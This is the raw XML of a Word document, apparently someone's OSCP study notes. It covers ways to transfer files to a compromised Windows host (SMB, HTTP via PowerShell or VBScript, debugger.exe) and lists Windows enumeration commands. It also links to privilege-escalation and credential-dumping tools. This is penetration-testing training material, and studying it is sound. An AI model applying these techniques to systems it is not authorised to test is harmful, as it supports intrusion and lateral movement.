          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00510E0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-server at Kali. Then use </w:t>
      </w:r>
      <w:r w:rsidR="00510E01" w:rsidRPr="00510E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="242729"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>net view</w:t>
      </w:r>
      <w:r w:rsidRPr="00510E0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to access shared folders. For details on this refer </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="006C345B" w:rsidRPr="00510E01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this blog</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A12994F" w14:textId="03D55BFD" w:rsidR="00510E01" w:rsidRDefault="00510E01" w:rsidP="00510E01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F103FB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Using HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00370804" w:rsidRPr="00F103FB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00370804" w:rsidRPr="00F103FB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28F8D25F" w14:textId="2B36B262" w:rsidR="00510E01" w:rsidRDefault="00510E01" w:rsidP="00510E01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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Use steps mentioned earlier to download a file using HTTP. </w:t>
      </w:r>
      <w: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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C66194A" w14:textId="1B4CD5D3" w:rsidR="00370804" w:rsidRDefault="00370804" w:rsidP="00370804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F103FB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Using HTTP via VBScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB3BD17" w14:textId="50581B06" w:rsidR="00370804" w:rsidRDefault="00370804" w:rsidP="00370804">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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1A44C04" wp14:editId="705E9CEE">
            <wp:extent cx="5943600" cy="4345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990F" w14:textId="77C37793" w:rsidR="00370804" w:rsidRDefault="00370804" w:rsidP="00370804">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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7FB9343" wp14:editId="680B128F">
            <wp:extent cx="5943600" cy="941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26C8" w14:textId="77777777" w:rsidR="00F103FB" w:rsidRDefault="00F103FB" w:rsidP="00F103FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="242729"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F103FB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="242729"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Using debugger.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="242729"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CF32B9" w14:textId="4C1A72DC" w:rsidR="00F103FB" w:rsidRPr="00F103FB" w:rsidRDefault="00F103FB" w:rsidP="00F103FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="242729"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242729"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Last but not least you can use debugger.exe to transfer files to Windows. This is useful only for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242729"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>32 bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242729"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> machines. Refer to steps mentioned at </w:t>
      </w:r>
      <w:r w:rsidR="00F24255">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242729"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Pg-204 of OSCP study material.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589F9E7E" w14:textId="77777777" w:rsidR="00370804" w:rsidRDefault="00370804" w:rsidP="00370804">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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</w:p>
    <w:p w14:paraId="39D5DD39" w14:textId="77777777" w:rsidR="007A45C8" w:rsidRDefault="007A45C8" w:rsidP="00C67339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7BEFB3EE" w14:textId="72C81D47" w:rsidR="00A944C2" w:rsidRDefault="00A944C2" w:rsidP="005C0FC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Some useful commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F619ED" w14:textId="167B68A7" w:rsidR="00A944C2" w:rsidRPr="005D383E" w:rsidRDefault="00A944C2" w:rsidP="005D383E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383E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>more +2 myfile.txt</w:t>
      </w:r>
      <w:r w:rsidR="00F63413" w:rsidRPr="005D383E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> // print myfile.txt after </w:t>
      </w:r>
      <w:r w:rsidR="007964C6" w:rsidRPr="005D383E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>first two</w:t>
      </w:r>
      <w:r w:rsidR="00F63413" w:rsidRPr="005D383E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> line</w:t>
      </w:r>
      <w:r w:rsidR="007964C6" w:rsidRPr="005D383E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC63082" w14:textId="332420F2" w:rsidR="005D383E" w:rsidRPr="005D383E" w:rsidRDefault="005D383E" w:rsidP="005D383E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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D383E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D383E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -command "&amp; {Get-Content &lt;filename&gt; -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D383E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TotalCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D383E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> *n*}"// </w:t>
      </w:r>
      <w:r w:rsidRPr="005D383E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>head -n &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0218244F" w14:textId="17E89861" w:rsidR="00A944C2" w:rsidRDefault="005D383E" w:rsidP="005D383E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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D383E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D383E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -command "&amp; {Get-Content &lt;filename&gt; | Select-Object -last *n*}" // </w:t>
      </w:r>
      <w:r w:rsidRPr="005D383E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tail -n &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512A72EA" w14:textId="5A0D4D42" w:rsidR="004B0995" w:rsidRDefault="004B0995" w:rsidP="005D383E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runas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /profile /user:&lt;username&gt; “&lt;command&gt;” // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>used to run ‘command’ as ‘username’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B59CC18" w14:textId="59495254" w:rsidR="004B0995" w:rsidRDefault="004B0995" w:rsidP="005D383E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icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;file/folder/binary&gt; // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to see permissions given to a &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE8364E" w14:textId="36F4B970" w:rsidR="004B0995" w:rsidRDefault="004B0995" w:rsidP="005D383E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B0995">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657AD4D4" w14:textId="35C60029" w:rsidR="004B0995" w:rsidRDefault="004B0995" w:rsidP="005D383E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net </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0800F525" w14:textId="372EA468" w:rsidR="00EC6E10" w:rsidRDefault="00EC6E10" w:rsidP="005D383E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Dump all running processes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1365FFE0" w14:textId="7D85DF28" w:rsidR="00EC6E10" w:rsidRDefault="00EC6E10" w:rsidP="00EC6E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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Tasklist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; &lt;file name.txt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF0CD3" w14:textId="537ED671" w:rsidR="00EC6E10" w:rsidRDefault="00EC6E10" w:rsidP="00EC6E10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Wmic service list full &lt;file name.txt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492F4820" w14:textId="178552AA" w:rsidR="00EC6E10" w:rsidRPr="00733833" w:rsidRDefault="00EC6E10" w:rsidP="00733833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Wmic process </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>file name.txt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54026137" w14:textId="1D8D65AE" w:rsidR="002C2EA2" w:rsidRDefault="002C2EA2" w:rsidP="005D383E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type &lt;filename&gt; // </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2EA2">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to see contents of a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3912AB" w14:textId="3896F338" w:rsidR="00733833" w:rsidRDefault="004B0995" w:rsidP="00733833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733833">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11FD8E8D" w14:textId="20A152EB" w:rsidR="003D3F55" w:rsidRPr="00733833" w:rsidRDefault="003D3F55" w:rsidP="0073383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where /R &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dirName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt; &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fileName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; // </w:t>
      </w:r>
      <w:r w:rsidRPr="008D2937">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>look for all files with name &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D2937">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fileName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D2937">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; recursively under </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D2937">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D2937">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D2937">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dirName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D2937">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35948D93" w14:textId="3EA0E418" w:rsidR="00733833" w:rsidRPr="00733833" w:rsidRDefault="00733833" w:rsidP="00733833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33833">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">reg query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;registry path&gt; // </w:t>
      </w:r>
      <w:r w:rsidRPr="00733833">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to query any registry value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BFDC1" w14:textId="0DD4D77D" w:rsidR="00B51C3A" w:rsidRDefault="00B51C3A" w:rsidP="005D383E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findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A1CA8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="000A1CA8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to find a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395B9A5F" w14:textId="3D5B37CC" w:rsidR="000A1CA8" w:rsidRDefault="000A1CA8" w:rsidP="005D383E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 w:rsidRPr="000A1CA8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%COMSPEC%//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> gives absolute path of cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F786718" w14:textId="11F44F76" w:rsidR="00733833" w:rsidRPr="00733833" w:rsidRDefault="00733833" w:rsidP="005D383E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Dump a list of all files/folders present </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64991843" w14:textId="7581E5B1" w:rsidR="00733833" w:rsidRDefault="00733833" w:rsidP="00733833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /s &lt;path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A72F705" w14:textId="62AA4146" w:rsidR="003D3F55" w:rsidRPr="003D3F55" w:rsidRDefault="00733833" w:rsidP="003D3F55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tree &lt;path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254B88DA" w14:textId="7DC0252A" w:rsidR="00F15C5D" w:rsidRDefault="00173F97" w:rsidP="0005629C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Miscellaneous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F7D21" w14:textId="6726CDDA" w:rsidR="00173F97" w:rsidRPr="00733833" w:rsidRDefault="00290E1B" w:rsidP="0005629C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00173F97">
        <w:t xml:space="preserve">If you come across any exploit which is written in Python, then use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00173F97">
        <w:t>PyInstaller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00173F97">
        <w:t xml:space="preserve"> to convert the script into an executable. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C708D75" w14:textId="77777777" w:rsidR="00F15C5D" w:rsidRPr="00C67339" w:rsidRDefault="00F15C5D" w:rsidP="00C67339">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F15C5D" w:rsidRPr="00C6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79AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC24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61FBD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A04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3447A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="52DE6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C11F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE28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81634"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10E0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7371C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F1F4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0727D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C4CEB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B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="862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46963"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7B58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E6BD2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BA8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9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88"/>
    <w:rsid w:val="00001578"/>
    <w:rsid w:val="000471B9"/>
    <w:rsid w:val="0005629C"/>
    <w:rsid w:val="00066D92"/>
    <w:rsid w:val="00071980"/>
    <w:rsid w:val="000918B3"/>
    <w:rsid w:val="00094739"/>
    <w:rsid w:val="000A1CA8"/>
    <w:rsid w:val="00120340"/>
    <w:rsid w:val="00131A33"/>
    <w:rsid w:val="00173F97"/>
    <w:rsid w:val="00187AF8"/>
    <w:rsid w:val="001912F0"/>
    <w:rsid w:val="001F10F5"/>
    <w:rsid w:val="00235AFB"/>
    <w:rsid w:val="00244A96"/>
    <w:rsid w:val="00277D3C"/>
    <w:rsid w:val="00290E1B"/>
    <w:rsid w:val="002C2EA2"/>
    <w:rsid w:val="0031725E"/>
    <w:rsid w:val="003329F2"/>
    <w:rsid w:val="00342C90"/>
    <w:rsid w:val="00370804"/>
    <w:rsid w:val="003B0373"/>
    <w:rsid w:val="003C54D7"/>
    <w:rsid w:val="003C7AD3"/>
    <w:rsid w:val="003D3F55"/>
    <w:rsid w:val="00456EBA"/>
    <w:rsid w:val="004B0995"/>
    <w:rsid w:val="004B3A44"/>
    <w:rsid w:val="004E664A"/>
    <w:rsid w:val="00510E01"/>
    <w:rsid w:val="00536A92"/>
    <w:rsid w:val="005C0FC3"/>
    <w:rsid w:val="005C2DF9"/>
    <w:rsid w:val="005D383E"/>
    <w:rsid w:val="00612E87"/>
    <w:rsid w:val="006227BC"/>
    <w:rsid w:val="00667970"/>
    <w:rsid w:val="006C345B"/>
    <w:rsid w:val="006D4072"/>
    <w:rsid w:val="006E6F81"/>
    <w:rsid w:val="006F6C09"/>
    <w:rsid w:val="00705BFE"/>
    <w:rsid w:val="00724E46"/>
    <w:rsid w:val="00733833"/>
    <w:rsid w:val="007442DE"/>
    <w:rsid w:val="007964C6"/>
    <w:rsid w:val="007A45C8"/>
    <w:rsid w:val="007B3C5E"/>
    <w:rsid w:val="008B0EFD"/>
    <w:rsid w:val="008D2937"/>
    <w:rsid w:val="00910607"/>
    <w:rsid w:val="00915131"/>
    <w:rsid w:val="0095654C"/>
    <w:rsid w:val="009A2376"/>
    <w:rsid w:val="009B7B90"/>
    <w:rsid w:val="009D50BB"/>
    <w:rsid w:val="009F24EB"/>
    <w:rsid w:val="00A944C2"/>
    <w:rsid w:val="00AA3909"/>
    <w:rsid w:val="00AD709F"/>
    <w:rsid w:val="00B45916"/>
    <w:rsid w:val="00B51C3A"/>
    <w:rsid w:val="00BD6351"/>
    <w:rsid w:val="00C16B89"/>
    <w:rsid w:val="00C20BF7"/>
    <w:rsid w:val="00C33D62"/>
    <w:rsid w:val="00C67339"/>
    <w:rsid w:val="00CC1CB3"/>
    <w:rsid w:val="00D3285D"/>
    <w:rsid w:val="00DD0A4F"/>
    <w:rsid w:val="00DE022F"/>
    <w:rsid w:val="00DE1D49"/>
    <w:rsid w:val="00E2441D"/>
    <w:rsid w:val="00E54D63"/>
    <w:rsid w:val="00EC4EAB"/>
    <w:rsid w:val="00EC6E10"/>
    <w:rsid w:val="00EF0788"/>
    <w:rsid w:val="00F0177D"/>
    <w:rsid w:val="00F0384F"/>
    <w:rsid w:val="00F103FB"/>
    <w:rsid w:val="00F15C5D"/>
    <w:rsid w:val="00F24255"/>
    <w:rsid w:val="00F2616E"/>
    <w:rsid w:val="00F51A87"/>
    <w:rsid w:val="00F63413"/>
    <w:rsid w:val="00FE4827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494C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{95ACBF06-02DE-4944-A482-DAB33584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0EF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44A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A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4A9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26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D3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E1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1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amratashok/nishang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medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm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blog.ropnop.com/transferring-files-from-kali-to-window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frizb/Windows-Privilege-Escalation" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=lP-E5vmZNC0" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ampliasecurity.com/research/windows-credentials-editor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github.com/besimorhino/powerca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rizb/Windows-Privilege-Escalation" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSplo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Keshaw Burnwal</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Keshaw Burnwal</cp:lastModifiedBy>
  <cp:revision>63</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-06-15T06:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-11T22:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>